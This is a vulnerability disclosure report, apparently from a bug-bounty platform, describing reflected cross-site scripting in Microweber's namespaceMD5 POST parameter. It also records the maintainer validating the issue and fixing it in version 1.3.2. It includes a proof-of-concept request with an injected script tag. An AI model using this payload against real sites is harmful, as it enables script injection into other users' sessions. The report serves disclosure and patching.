Post parameter namespaceMD5 is vulnerable to reflected XSS in microweber/microweber

Valid

Reported on

Nov 8th 2022


Description

The POST parameter namespaceMD5 is vulnerable to reflected XSS.

Proof of Concept

// POST request to /module with parameters and payload
namespaceMD5=3389dae361af79b04c9c8e7057f60cc6test}'')"><script>alert()</script><script>alert()</script>&module=settings%2Fgroup%2Flanguage_import&id=mw_admin_import_language_modal_content

Impact

JS injection.

We are processing your report and will contact the microweber team within 24 hours. 2 months ago
We have contacted a member of the microweber team and are waiting to hear back 2 months ago
Peter Ivanov
a month ago

Maintainer


Hello

This error appears only when you have enable the debug mode. Currently on the demo site the debug mode is enabled and that's why you see the error

On user sites an on production sites, the debug mode is not enabled

Peter Ivanov gave praise a month ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Peter Ivanov
a month ago

Maintainer


oops sorry , i replied to the wrong vulnerability , checking this now

Peter Ivanov validated this vulnerability a month ago
krizzsk has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.3.2 with commit df8add a month ago
Peter Ivanov has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 20th 2022
language_import.php#L32 has been validated
to join this conversation